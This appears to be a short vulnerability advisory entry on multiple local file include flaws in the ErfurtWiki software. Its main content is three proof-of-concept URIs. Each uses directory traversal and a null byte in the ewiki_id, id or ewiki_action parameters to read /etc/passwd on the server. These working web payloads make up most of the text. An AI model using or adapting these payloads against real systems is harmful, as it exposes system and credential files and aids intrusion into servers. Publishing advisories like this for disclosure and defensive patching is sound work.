• info
• discussion
• exploit
• solution
• references

ErfurtWiki Multiple Local File Include Vulnerabilities

Attackers can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/ewiki/fragments/css.php?ewiki_id=../../../../../../../../etc/passwd%00&ewiki_action=1
http://www.example.com/ewiki/?id=../../../../../../../../../../../../etc/passwd%00
http://www.example.com/ewiki/fragments/css.php?ewiki_id=1&ewiki_action=../../../../../../../../etc/passwd%00